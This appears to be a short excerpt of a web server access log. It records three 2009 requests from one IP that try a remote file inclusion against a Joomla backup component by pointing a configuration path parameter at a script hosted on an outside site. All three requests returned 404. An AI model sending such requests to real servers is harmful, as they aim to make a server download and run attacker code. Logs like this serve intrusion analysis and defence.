82.195.252.206 - - [26/Nov/2009:01:39:20 -0500] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
82.195.252.206 - - [26/Nov/2009:01:39:20 -0500] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
82.195.252.206 - - [26/Nov/2009:01:39:20 -0500] "GET /logs/access_log.Q109051200//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
